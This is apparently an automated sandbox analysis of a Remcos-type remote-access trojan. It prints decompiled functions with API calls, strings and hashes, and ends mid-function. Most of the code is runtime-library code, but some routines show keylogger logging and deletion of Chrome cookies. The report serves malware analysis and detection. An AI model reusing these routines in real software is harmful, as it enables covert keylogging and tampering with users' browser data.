                    • Opcode Fuzzy Hash: 724a0fe27f4f6489b78bfe97240ea4b5cf9d33245695f08732568f9e26d24ae0
                    • Instruction Fuzzy Hash: D0218E31A102056ACB14F7F1CC5B9EE7768AF14309F44013EF901B71D3EA799A598A9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E004501D3(char* _a4, short* _a8) {
                    				int _v8;
                    				void* __ecx;
                    				void* __esi;
                    				short* _t10;
                    				short* _t14;
                    				int _t15;
                    				short* _t16;
                    				void* _t26;
                    				int _t27;
                    				void* _t29;
                    				short* _t35;
                    				short* _t39;
                    				short* _t40;
                    
                    				_push(_t29);
                    				if(_a4 != 0) {
                    					_t39 = _a8;
                    					__eflags = _t39;
                    					if(__eflags != 0) {
                    						_push(_t26);
                    						E004420AE(_t29, _t39, __eflags);
                    						asm("sbb ebx, ebx");
                    						_t35 = 0;
                    						_t27 = _t26 + 1;
                    						 *_t39 = 0;
                    						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
                    						_v8 = _t10;
                    						__eflags = _t10;
                    						if(_t10 != 0) {
                    							_t40 = E0043F98C(_t29, _t10 + _t10);
                    							__eflags = _t40;
                    							if(_t40 != 0) {
                    								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
                    								__eflags = _t15;
                    								if(_t15 != 0) {
                    									_t16 = _t40;
                    									_t40 = 0;
                    									_t35 = 1;
                    									__eflags = 1;
                    									 *_a8 = _t16;
                    								} else {
                    									E0043A4CE(GetLastError());
                    								}
                    							}
                    							E004401F5(_t40);
                    							_t14 = _t35;
                    						} else {
                    							E0043A4CE(GetLastError());
                    							_t14 = 0;
                    						}
                    					} else {
                    						 *((intOrPtr*)(E0043A504())) = 0x16;
                    						E0043695D();
                    						_t14 = 0;
                    					}
                    					return _t14;
                    				}
                    				 *((intOrPtr*)(E0043A504())) = 0x16;
                    				E0043695D();
                    				return 0;
                    			}

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 03f5aa3418e858ee643f474f580926e5b9a5c2813f3d30507152f14f29747a58
                    • Instruction ID: 3e8c339fdf138c944f03ee87ae81e8163027b6b6686a5aa70f35362f2fa299d2
                    • Opcode Fuzzy Hash: 03f5aa3418e858ee643f474f580926e5b9a5c2813f3d30507152f14f29747a58
                    • Instruction Fuzzy Hash: B5113D765002157BDB206F729C0D92B7AACDF86762F1046ABFC19C7242DA3CCC05C679
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E0040E7E5(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                    				void* _v8;
                    				char _v12;
                    				char _v24;
                    				void* __esi;
                    				intOrPtr _t40;
                    				void* _t48;
                    				intOrPtr* _t51;
                    
                    				E00430058( &_v12, 0);
                    				_t48 =  *0x46db84;
                    				_v8 = _t48;
                    				_t51 = E0040BA23(_a4, E0040B94C(0x46b130));
                    				if(_t51 != 0) {
                    					L5:
                    					E004300B0( &_v12);
                    					return _t51;
                    				} else {
                    					if(_t48 == 0) {
                    						__eflags = E0040BB55(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
                    						if(__eflags == 0) {
                    							E0040B812( &_v24);
                    							E0043205A( &_v24, 0x46864c);
                    							asm("int3");
                    							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
                    							__eflags =  *0x46db78 -  *((intOrPtr*)(_t40 + 4));
                    							if( *0x46db78 >  *((intOrPtr*)(_t40 + 4))) {
                    								_push(_t51);
                    								E0042F114(0x46db78);
                    								__eflags =  *0x46db78 - 0xffffffff;
                    								if( *0x46db78 == 0xffffffff) {
                    									E0040EB9C();
                    									E0042F49E(__eflags, 0x452871);
                    									E0042F0D5(0x46db78, 0x46db78);
                    								}
                    							}
                    							return 0x46db7c;
                    						} else {
                    							_t51 = _v8;
                    							 *0x46db84 = _t51;
                    							 *((intOrPtr*)( *_t51 + 4))();
                    							E00430269(__eflags, _t51);
                    							goto L5;
                    						}
                    					} else {
                    						_t51 = _t48;
                    						goto L5;
                    					}
                    				}
                    			}

                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040E7F2
                    • int.LIBCPMT ref: 0040E805
                      • Part of subcall function 0040B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0040B95D
                      • Part of subcall function 0040B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B977
                    • std::locale::_Getfacet.LIBCPMT ref: 0040E80E
                    • std::_Facet_Register.LIBCPMT ref: 0040E845
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040E84E
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86C
                    • __Init_thread_footer.LIBCMT ref: 0040E8AD
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
                    • String ID:
                    • API String ID: 2409581025-0
                    • Opcode ID: e7a0018a1746f9c7bf4673166abd77dce41b100f788e83672023b9d031f69d2e
                    • Instruction ID: 03fd642756e00294ec4acf8aadaa37b4638c280f2e7f5516d862d72f379d1b29
                    • Opcode Fuzzy Hash: e7a0018a1746f9c7bf4673166abd77dce41b100f788e83672023b9d031f69d2e
                    • Instruction Fuzzy Hash: 7C21D332E001149BC714FB69D906A9E77B8DB44724B60417FE800B72D2EB78AD01879E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E00409634(void* __ebx, void* __ecx, void* __eflags, char _a4) {
                    				struct _SYSTEMTIME _v20;
                    				char _v44;
                    				char _v68;
                    				void* __edi;
                    				void* __esi;
                    				WCHAR* _t33;
                    				void* _t65;
                    				void* _t67;
                    				void* _t70;
                    
                    				_t70 = __eflags;
                    				_t42 = __ebx;
                    				_t67 = __ecx;
                    				GetLocalTime( &_v20);
                    				E00401EFA( &_a4, _t26, _t67, E004030A6(__ebx,  &_v44, E00409E69( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t70,  &_a4), _t65, _t70, L"]\r\n"));
                    				E00401EF0();
                    				E00401EF0();
                    				_push(0x64 + E00402489() * 2);
                    				_t33 = E004394F6( &_a4);
                    				_t66 = _t33;
                    				_push(_v20.wSecond & 0x0000ffff);
                    				_push(_v20.wMinute & 0x0000ffff);
                    				_push(_v20.wHour & 0x0000ffff);
                    				_push(_v20.wDay & 0x0000ffff);
                    				_push(_v20.wMonth & 0x0000ffff);
                    				_push(_v20.wYear & 0x0000ffff);
                    				wsprintfW(_t33, E00401EEB( &_a4));
                    				if( *((char*)(_t67 + 0x49)) != 0) {
                    					E0040766C(__ebx, _t67 + 4, _t66, _t66);
                    				}
                    				if( *((char*)(_t67 + 0x4a)) != 0) {
                    					E0040766C(_t42, _t67 + 0x1c, _t66, _t66);
                    					SetEvent( *(_t67 + 0x3c));
                    				}
                    				L004394F1(_t66);
                    				return E00401EF0();
                    			}

                    APIs
                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                      • Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79
                    • wsprintfW.USER32 ref: 004096C3
                    • SetEvent.KERNEL32(?,00000000), ref: 004096ED
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: EventLocalTimechar_traitswsprintf
                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                    • API String ID: 3003339404-248792730
                    • Opcode ID: c6fa71370f96352e3d1fd7127862656f83fd8a9c7cdc59eaf0d99a36eee52d65
                    • Instruction ID: dd13208d924f003fd79d0c2a63de2e9b71645c7df6fae77663c0b624719a6389
                    • Opcode Fuzzy Hash: c6fa71370f96352e3d1fd7127862656f83fd8a9c7cdc59eaf0d99a36eee52d65
                    • Instruction Fuzzy Hash: 7021A4724001186AC728EBA5EC958FF77B9AF08355F00413FF847621D2EE78AA45D768
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 45%
                    			E00416F19(void* __edx) {
                    				intOrPtr _v8;
                    				char _v12;
                    				char _v20;
                    				char _v28;
                    				char _v36;
                    				char _v44;
                    				char _v52;
                    				void* _t25;
                    				void* _t26;
                    				void* _t27;
                    				void* _t29;
                    				void* _t30;
                    				void* _t40;
                    				intOrPtr* _t44;
                    
                    				_t40 = __edx;
                    				_t44 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
                    				 *_t44( &_v52,  &_v28,  &_v20);
                    				Sleep(0x3e8);
                    				 *_t44( &_v44,  &_v36,  &_v12);
                    				_t25 = E00416FCE( &_v12);
                    				_t26 = E00416FCE( &_v20);
                    				asm("sbb ebx, edx");
                    				_t27 = E00416FCE( &_v28);
                    				asm("sbb ebx, edx");
                    				_v8 = _t25 - _t26 - _t27 + E00416FCE( &_v36);
                    				asm("adc ebx, edx");
                    				_t29 = E00416FCE( &_v44);
                    				asm("sbb esi, edx");
                    				_t30 = E00416FCE( &_v52);
                    				asm("adc esi, edx");
                    				return E00450880(E00450840(_t25 - _t26 - _t27 + E00416FCE( &_v36) - _t29 + _t30, _t40, 0x64, 0), _t40, _v8, _t40);
                    			}

                    APIs
                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0046BACC,?,?,?,?,?,?,?,?,?,?,?,004135C0), ref: 00416F2C
                    • GetProcAddress.KERNEL32(00000000), ref: 00416F33
                    • Sleep.KERNEL32(000003E8,?,0046BACC,?,?,?,?,?,?,?,?,?,?,?,004135C0,00000095), ref: 00416F4E
                    • __aulldiv.LIBCMT ref: 00416FC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProcSleep__aulldiv
                    • String ID: GetSystemTimes$kernel32.dll
                    • API String ID: 482274533-1354958348
                    • Opcode ID: b7bf844ce0dfb244a469c2aba271e743374f701500a0765d18e98eef1d7050f3
                    • Instruction ID: 018d20e96d693e42a87ad15873a94ebdad9b14d36b0451d32c6181a8858f91cb
                    • Opcode Fuzzy Hash: b7bf844ce0dfb244a469c2aba271e743374f701500a0765d18e98eef1d7050f3
                    • Instruction Fuzzy Hash: 89118477D002286BCB14EBF5DC85DEFBB7CAB44755F05063AF905E3141ED389A4886A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E105D9FE8(intOrPtr _a4) {
                    				void* _t18;
                    
                    				_t45 = _a4;
                    				if(_a4 != 0) {
                    					E105D9D2F(_t45, 7);
                    					E105D9D2F(_t45 + 0x1c, 7);
                    					E105D9D2F(_t45 + 0x38, 0xc);
                    					E105D9D2F(_t45 + 0x68, 0xc);
                    					E105D9D2F(_t45 + 0x98, 2);
                    					E105D1063( *((intOrPtr*)(_t45 + 0xa0)));
                    					E105D1063( *((intOrPtr*)(_t45 + 0xa4)));
                    					E105D1063( *((intOrPtr*)(_t45 + 0xa8)));
                    					E105D9D2F(_t45 + 0xb4, 7);
                    					E105D9D2F(_t45 + 0xd0, 7);
                    					E105D9D2F(_t45 + 0xec, 0xc);
                    					E105D9D2F(_t45 + 0x11c, 0xc);
                    					E105D9D2F(_t45 + 0x14c, 2);
                    					E105D1063( *((intOrPtr*)(_t45 + 0x154)));
                    					E105D1063( *((intOrPtr*)(_t45 + 0x158)));
                    					E105D1063( *((intOrPtr*)(_t45 + 0x15c)));
                    					return E105D1063( *((intOrPtr*)(_t45 + 0x160)));
                    				}
                    				return _t18;
                    			}

                    APIs
                      • Part of subcall function 105D9D2F: _free.LIBCMT ref: 105D9D58
                    • _free.LIBCMT ref: 105DA036
                      • Part of subcall function 105D1063: HeapFree.KERNEL32(00000000,00000000,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?), ref: 105D1079
                      • Part of subcall function 105D1063: GetLastError.KERNEL32(?,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?,?), ref: 105D108B
                    • _free.LIBCMT ref: 105DA041
                    • _free.LIBCMT ref: 105DA04C
                    • _free.LIBCMT ref: 105DA0A0
                    • _free.LIBCMT ref: 105DA0AB
                    • _free.LIBCMT ref: 105DA0B6
                    • _free.LIBCMT ref: 105DA0C1
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                    • Instruction ID: 27460e2693a3df4c2be1fc024b6c022e7dcbcad82717d958d80944cdc1236c6e
                    • Opcode Fuzzy Hash: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                    • Instruction Fuzzy Hash: 9411EA75640B48FBD520B7B9CC4EFCBBBAEDF84740F404C16B299AA250DA65B5444790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0044917A(intOrPtr _a4) {
                    				void* _t18;
                    				intOrPtr _t45;
                    
                    				_t45 = _a4;
                    				if(_t45 != 0) {
                    					E00448EC1(_t45, 7);
                    					_t2 = _t45 + 0x1c; // 0x1c
                    					E00448EC1(_t2, 7);
                    					_t3 = _t45 + 0x38; // 0x38
                    					E00448EC1(_t3, 0xc);
                    					_t4 = _t45 + 0x68; // 0x68
                    					E00448EC1(_t4, 0xc);
                    					_t5 = _t45 + 0x98; // 0x98
                    					E00448EC1(_t5, 2);
                    					E004401F5( *((intOrPtr*)(_t45 + 0xa0)));
                    					E004401F5( *((intOrPtr*)(_t45 + 0xa4)));
                    					E004401F5( *((intOrPtr*)(_t45 + 0xa8)));
                    					_t9 = _t45 + 0xb4; // 0xb4
                    					E00448EC1(_t9, 7);
                    					_t10 = _t45 + 0xd0; // 0xd0
                    					E00448EC1(_t10, 7);
                    					_t11 = _t45 + 0xec; // 0xec
                    					E00448EC1(_t11, 0xc);
                    					_t12 = _t45 + 0x11c; // 0x11c
                    					E00448EC1(_t12, 0xc);
                    					_t13 = _t45 + 0x14c; // 0x14c
                    					E00448EC1(_t13, 2);
                    					E004401F5( *((intOrPtr*)(_t45 + 0x154)));
                    					E004401F5( *((intOrPtr*)(_t45 + 0x158)));
                    					E004401F5( *((intOrPtr*)(_t45 + 0x15c)));
                    					return E004401F5( *((intOrPtr*)(_t45 + 0x160)));
                    				}
                    				return _t18;
                    			}

                    APIs
                      • Part of subcall function 00448EC1: _free.LIBCMT ref: 00448EEA
                    • _free.LIBCMT ref: 004491C8
                      • Part of subcall function 004401F5: HeapFree.KERNEL32(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                      • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                    • _free.LIBCMT ref: 004491D3
                    • _free.LIBCMT ref: 004491DE
                    • _free.LIBCMT ref: 00449232
                    • _free.LIBCMT ref: 0044923D
                    • _free.LIBCMT ref: 00449248
                    • _free.LIBCMT ref: 00449253
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                    • Instruction ID: d0ac5bec4300d42e5daa1f0178d5914e2472619a840d7a0986f756f09d30ade7
                    • Opcode Fuzzy Hash: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                    • Instruction Fuzzy Hash: A7115172940B04BAFA20BBB2CC47FCF779CAF00705F50081EB39AA6052DE7EB5244658
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E004350B5(void* __ecx) {
                    				void* _t4;
                    				void* _t11;
                    				void* _t16;
                    				long _t25;
                    				void* _t28;
                    
                    				if( *0x46a090 != 0xffffffff) {
                    					_t25 = GetLastError();
                    					_t11 = E00431BD8(__eflags,  *0x46a090);
                    					__eflags = _t11 - 0xffffffff;
                    					if(_t11 == 0xffffffff) {
                    						L5:
                    						_t11 = 0;
                    					} else {
                    						__eflags = _t11;
                    						if(__eflags == 0) {
                    							_t4 = E00431C12(__eflags,  *0x46a090, 0xffffffff);
                    							_pop(_t16);
                    							__eflags = _t4;
                    							if(_t4 != 0) {
                    								_t28 = E0043F348(_t16, 1, 0x28);
                    								__eflags = _t28;
                    								if(__eflags == 0) {
                    									L8:
                    									_t11 = 0;
                    									E00431C12(__eflags,  *0x46a090, 0);
                    								} else {
                    									__eflags = E00431C12(__eflags,  *0x46a090, _t28);
                    									if(__eflags != 0) {
                    										_t11 = _t28;
                    										_t28 = 0;
                    										__eflags = 0;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    								E004401F5(_t28);
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    					SetLastError(_t25);
                    					return _t11;
                    				} else {
                    					return 0;
                    				}
                    			}

                    APIs
                    • GetLastError.KERNEL32(?,?,004350AC,004321F2), ref: 004350C3
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004350D1
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004350EA
                    • SetLastError.KERNEL32(00000000,?,004350AC,004321F2), ref: 0043513C
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: 3f66e197c8296636e8c0cb4b5eca29cb01eb5dab6965f0ce3b8c02db1c8883f5
                    • Instruction ID: a515c6194843fa53ce6413da374b9e5764b9e55810f12d35b037beed10178e82
                    • Opcode Fuzzy Hash: 3f66e197c8296636e8c0cb4b5eca29cb01eb5dab6965f0ce3b8c02db1c8883f5
                    • Instruction Fuzzy Hash: EC01F532549B115EEA152E79AC4562B2654DB0D779F20223FF220511F1FE594C11564E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E00409F83(void* __edi, void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				void* __ebx;
                    				void* __ebp;
                    				long _t18;
                    				void* _t20;
                    				void* _t21;
                    				void* _t28;
                    				void* _t31;
                    				void* _t32;
                    
                    				_t35 = __eflags;
                    				_t31 = __edi;
                    				_t30 = E00402084(_t20,  &_v52, E0043988A(_t20, __eflags, "UserProfile"));
                    				E00405343(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                    				E00401FC7();
                    				if(DeleteFileA(E00401F95( &_v28)) != 0) {
                    					_t28 = _t32 - 0x18;
                    					_push("\n[Chrome Cookies found, cleared!]");
                    					goto L6;
                    				} else {
                    					_t18 = GetLastError();
                    					if(_t18 == 0 || _t18 == 1) {
                    						_t28 = _t32 - 0x18;
                    						_push("\n[Chrome Cookies not found]");
                    						L6:
                    						E00402084(_t20, _t28);
                    						E0040A6EF(_t20, _t30, __eflags);
                    						_t21 = 1;
                    					} else {
                    						_t21 = 0;
                    					}
                    				}
                    				E00401FC7();
                    				return _t21;
                    			}

                    APIs
                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 00409FBF
                    • GetLastError.KERNEL32 ref: 00409FC9
                    Strings
                    • [Chrome Cookies not found], xrefs: 00409FE3
                    • UserProfile, xrefs: 00409F8F
                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 00409F8A
                    • [Chrome Cookies found, cleared!], xrefs: 00409FEF
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    • API String ID: 2018770650-304995407
                    • Opcode ID: 406161bcccb04ea4bd035d61b719718c660ea5330f87ff24f7238f47a886d868
                    • Instruction ID: a05454d7c9f7ea62d42fa80a0568230d8b7d5f3f2d87ad081c1d7252bc9e5d76
                    • Opcode Fuzzy Hash: 406161bcccb04ea4bd035d61b719718c660ea5330f87ff24f7238f47a886d868
                    • Instruction Fuzzy Hash: 8501F72164020B57CA09BA75CD5B8BF7724A911309B50017FFC02B61E3FD394D09C5CB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E0040511B(void* __ecx, void* __edi, char _a4) {
                    				void* _t17;
                    				void* _t22;
                    				void* _t23;
                    
                    				_t22 = __ecx;
                    				if( *((char*)(__ecx + 0x50)) == 0) {
                    					return 0;
                    				}
                    				if(_a4 == 0) {
                    					_t24 = _t23 - 0x18;
                    					E00402084(_t17, _t23 - 0x18, "Connection KeepAlive disabled");
                    					E00402084(_t17, _t24 - 0x18, "[WARNING]");
                    					E00416C80(_t17, __edi);
                    				}
                    				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
                    				SetEvent( *(_t22 + 0x54));
                    				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
                    				CloseHandle( *(_t22 + 0x58));
                    				return 1;
                    			}

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C2E8,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405159
                    • SetEvent.KERNEL32(?,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405165
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405170
                    • CloseHandle.KERNEL32(?,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405179
                      • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                    • String ID: Connection KeepAlive disabled$[WARNING]
                    • API String ID: 2993684571-804309475
                    • Opcode ID: 6700614dca504244a55bd319c10cf8dd84f4c90e38274ba8f930ec3cb829daee
                    • Instruction ID: 60a08de37f047c10c4ebd60d286cc91250b6658f2aab9bb1a866a2a778ec74b8
                    • Opcode Fuzzy Hash: 6700614dca504244a55bd319c10cf8dd84f4c90e38274ba8f930ec3cb829daee
                    • Instruction Fuzzy Hash: E0F0C272900B407FDB103BB59C0EA7B7B98DB0135AF04057AFD41926E2DAB9D8548B9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			// Alarm routine: writes the "[ALARM]"-tagged log line "Alarm has been triggered!" and then plays a
                    			// sound file in a loop for ten seconds. The identification rests on the strings and API calls
                    			// below, not on symbols from the sample.
                    			E00416737(WCHAR* __ecx) {                                  // __ecx: wide-char path of the sound file to play
                    				void* __edi;
                    				void* _t7;
                    				void* _t11;
                    				WCHAR* _t13;
                    				void* _t15;
                    
                    				_t16 = _t15 - 0x18;
                    				_t13 = __ecx;
                    				E00402084(_t7, _t15 - 0x18, "Alarm has been triggered!");   // build the log message
                    				E00402084(_t7, _t16 - 0x18, "[ALARM]");                    // build the log tag
                    				E00416C80(_t7, _t11);                                       // log writer; calls GetLocalTime for the timestamp
                    				// 0x20009 = SND_FILENAME (0x20000) | SND_LOOP (0x8) | SND_ASYNC (0x1): play the file repeatedly and return at once
                    				PlaySoundW(_t13, GetModuleHandleA(0), 0x20009);
                    				Sleep(0x2710);                                              // 10000 ms
                    				return PlaySoundW(0, 0, 0);                                 // PlaySound(NULL, NULL, 0) stops the looping playback
                    			}


                    APIs
                      • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00416769
                    • PlaySoundW.WINMM(00000000,00000000), ref: 00416777
                    • Sleep.KERNEL32(00002710), ref: 0041677E
                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00416787
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: PlaySound$HandleLocalModuleSleepTime
                    • String ID: Alarm has been triggered!$[ALARM]
                    • API String ID: 614609389-1190268461
                    • Opcode ID: a72f7bbe0ff649907879a8ec4559d77060f8c7e034846c054ca5bf069f778dcf
                    • Instruction ID: 3dbfa3bc3acc833274b6e0f43357c326849184f6c95de14e1e3858e62b15b156
                    • Opcode Fuzzy Hash: a72f7bbe0ff649907879a8ec4559d77060f8c7e034846c054ca5bf069f778dcf
                    • Instruction Fuzzy Hash: D9E09222A00221379514376A6D0FD6F3D28CAC2B62B01016FFE08661829D944810C6FB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			// Consistent with the MSVC CRT's _localtime64_s(struct tm *ptm, const __time64_t *ptime):
                    			// _a4 is the struct tm being filled (offsets 0x0 sec, 0x4 min, 0x8 hour, 0xc mday, 0x10 mon,
                    			// 0x14 year, 0x18 wday, 0x1c yday, 0x20 isdst); _a8 points at a 64-bit time_t whose low and
                    			// high dwords are read as *_a8 and *(_a8 + 4). CRT library code, not Remcos-specific logic.
                    			E105C6607(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
                    				intOrPtr _v0;
                    				char _v8;
                    				signed int _v12;
                    				char _v16;
                    				signed int _v20;
                    				char _v24;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t61;
                    				void* _t64;
                    				signed int _t67;
                    				signed int _t69;
                    				signed int _t70;
                    				signed int _t73;
                    				signed int _t75;
                    				signed int _t77;
                    				signed int _t78;
                    				intOrPtr _t80;
                    				signed int _t81;
                    				void* _t82;
                    				signed int _t84;
                    				void* _t85;
                    				signed int _t87;
                    				signed int _t93;
                    				signed int _t102;
                    				void* _t104;
                    				signed int _t107;
                    				signed int* _t110;
                    				signed int* _t111;
                    				intOrPtr* _t113;
                    				signed int _t118;
                    				signed int _t120;
                    				signed int _t123;
                    				void* _t125;
                    				signed int _t128;
                    				signed int _t131;
                    				signed int _t139;
                    				signed int _t145;
                    				void _t147;
                    				void* _t148;
                    				void* _t150;
                    				void* _t152;
                    				signed int _t153;
                    				signed int _t154;
                    				void* _t155;
                    				signed int _t156;
                    				signed int _t157;
                    				signed int _t158;
                    				intOrPtr _t159;
                    
                    				_t139 = __edx;
                    				_t155 = _a4;                                      // ptm
                    				if(_t155 == 0) {
                    					_t113 = E105CB372();                          // _errno()
                    					_t159 = 0x16;                                 // EINVAL
                    					 *_t113 = _t159;
                    					E105C77CB();                                  // _invalid_parameter_noinfo()
                    					return _t159;
                    				}
                    				_push(__edi);
                    				_t123 = 9;
                    				memset(_t155, _t61 | 0xffffffff, _t123 << 2);     // memset(ptm, 0xff, sizeof(struct tm)): 9 dwords
                    				_t145 = _a8;                                      // ptime
                    				__eflags = _t145;
                    				if(_t145 == 0) {
                    					_t111 = E105CB372();                          // _errno()
                    					_t158 = 0x16;                                 // EINVAL
                    					 *_t111 = _t158;
                    					E105C77CB();                                  // _invalid_parameter_noinfo()
                    					_t78 = _t158;
                    					L12:
                    					return _t78;
                    				}
                    				_push(__ebx);
                    				__eflags =  *(_t145 + 4);                         // high dword of *ptime: negative means *ptime < 0
                    				if(__eflags <= 0) {
                    					if(__eflags < 0) {
                    						L10:                                      // *ptime out of range: errno = EINVAL, return without _invalid_parameter
                    						_t110 = E105CB372();
                    						_t157 = 0x16;
                    						 *_t110 = _t157;
                    						_t78 = _t157;
                    						L11:
                    						goto L12;
                    					}
                    					__eflags =  *_t145;
                    					if( *_t145 < 0) {
                    						goto L10;
                    					}
                    				}
                    				_t64 = 7;
                    				__eflags =  *(_t145 + 4) - _t64;                  // high dword of *ptime vs 7
                    				if(__eflags >= 0) {
                    					if(__eflags > 0) {
                    						goto L10;                                 // *ptime > _MAX__TIME64_T (0x793406FFF)
                    					}
